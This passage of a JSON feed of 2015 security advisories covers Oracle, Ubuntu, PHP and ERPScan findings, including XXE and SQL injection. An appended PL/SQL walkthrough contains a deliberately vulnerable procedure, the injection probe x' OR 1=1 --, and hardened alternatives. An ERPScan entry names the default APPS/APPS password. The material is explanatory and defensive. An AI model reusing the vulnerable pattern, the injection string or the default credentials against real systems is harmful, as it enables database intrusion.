error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. 
Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important 
to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for 
debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. A local attacker could use this issue to elevate privileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n apport 2.19.1-0ubuntu4\r\n\r\nUbuntu 15.04:\r\n apport 2.17.2-0ubuntu1.7\r\n\r\nUbuntu 14.04 LTS:\r\n apport 2.14.1-0ubuntu3.18\r\n\r\nUbuntu 12.04 LTS:\r\n apport 2.0.1-0ubuntu17.13\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2782-1\r\n CVE-2015-1341\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/apport/2.19.1-0ubuntu4\r\n https://launchpad.net/ubuntu/+source/apport/2.17.2-0ubuntu1.7\r\n https://launchpad.net/ubuntu/+source/apport/2.14.1-0ubuntu3.18\r\n https://launchpad.net/ubuntu/+source/apport/2.0.1-0ubuntu17.13\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32660", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32660", "title": "[USN-2782-1] Apport vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", 
"CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 
vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. 
(CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4849"], 
"description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - XXE injection\r\nAdvisory ID: [ERPSCAN-15-029]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 21.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4849\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/IspPunchInServlet\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-029-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. 
Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32654", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32654", "title": "[ERPSCAN-15-029] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. 
VULNERABILITY DESCRIPTION\r\n\r\nThe problem is an SQL injection vulnerability. The code builds an SQL\r\nstatement from strings that an attacker can alter. The manipulated\r\nSQL statement can then be used to retrieve additional data from the\r\ndatabase or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of the SQL extension scripts (afamexts.sql) does not filter\r\nuser-supplied values, which allows SQL injection. The only defense\r\nmechanism is the password of the APPS schema: an attacker who knows it\r\n(for example, the default password APPS/APPS) can exploit the\r\ninjection with the high privileges of that account.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. 
It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. 
We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user-friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and a partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}
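The ERPSCAN-15-026 advisory above (section 7) describes the bug class only in words: a script builds an SQL statement from user-supplied strings without filtering them, and the APPS password is the only barrier. The advisory does not reproduce afamexts.sql, so the following PL/SQL is an added illustration of that class, not the affected Oracle code. The table fnd_extensions_demo, its rows, and the procedure names are constructed for the example; the vulnerable procedure keeps the concatenation defect on purpose, and the two alternatives beside it show the fixes that apply depending on whether the user value is data or an identifier.

```sql
-- Added example, not code from the advisory or from Oracle E-Business Suite.
-- Demo table (constructed): two rows so the effect of a rewritten predicate is visible.
CREATE TABLE fnd_extensions_demo (ext_name VARCHAR2(30));
INSERT INTO fnd_extensions_demo VALUES ('afamexts');
INSERT INTO fnd_extensions_demo VALUES ('other');
COMMIT;

-- Vulnerable pattern: the caller's string is spliced into the statement text,
-- so quote characters in it change the shape of the query.
CREATE OR REPLACE PROCEDURE find_ext_vuln (p_ext_name IN  VARCHAR2,
                                           p_count    OUT NUMBER) AS
  v_sql VARCHAR2(4000);
BEGIN
  v_sql := 'SELECT COUNT(*) FROM fnd_extensions_demo WHERE ext_name = '''
           || p_ext_name || '''';
  EXECUTE IMMEDIATE v_sql INTO p_count;
END find_ext_vuln;
/

-- Hardened form for data values: the value travels as a bind variable and is
-- compared, never parsed, so the same input matches no row.
CREATE OR REPLACE PROCEDURE find_ext_safe (p_ext_name IN  VARCHAR2,
                                           p_count    OUT NUMBER) AS
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM fnd_extensions_demo WHERE ext_name = :1'
    INTO p_count USING p_ext_name;
END find_ext_safe;
/

-- Identifiers (table or column names) cannot be bound. When a script must take
-- one from the caller, validate it with DBMS_ASSERT before concatenating;
-- SIMPLE_SQL_NAME raises ORA-44003 for anything that is not a plain SQL name.
CREATE OR REPLACE PROCEDURE count_rows_of (p_table IN  VARCHAR2,
                                           p_count OUT NUMBER) AS
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM ' || DBMS_ASSERT.SIMPLE_SQL_NAME(p_table)
    INTO p_count;
END count_rows_of;
/

-- Probe: the same injection string through each procedure. Alternative quoting
-- q'[...]' keeps the embedded single quote readable.
DECLARE
  n NUMBER;
BEGIN
  find_ext_vuln(q'[x' OR 1=1 --]', n);   -- predicate becomes ... = 'x' OR 1=1 --'
  DBMS_OUTPUT.PUT_LINE('vuln: '  || n);
  find_ext_safe(q'[x' OR 1=1 --]', n);   -- string is compared as a literal value
  DBMS_OUTPUT.PUT_LINE('safe: '  || n);
  count_rows_of('fnd_extensions_demo', n);
  DBMS_OUTPUT.PUT_LINE('ident: ' || n);
  BEGIN
    count_rows_of(q'[fnd_extensions_demo WHERE 1=1 --]', n);
  EXCEPTION
    WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE('ident rejected: ' || SQLERRM);
  END;
END;
/
```

Run with SERVEROUTPUT enabled in SQL*Plus or SQLcl. In the vulnerable procedure the trailing `--` comments out the closing quote that the code appends, so the injected `OR 1=1` is executed as part of the WHERE clause and every row is counted; in the bind-variable version the whole input is one comparison value and no row matches. The DBMS_ASSERT call covers the case the advisory's "filter user input values" wording points at when binding is impossible: the malformed identifier is rejected before any statement text is assembled. Note that the advisory's real issue remains privilege: these controls belong in the script itself, because once an attacker holds the APPS password the database offers no further filtering.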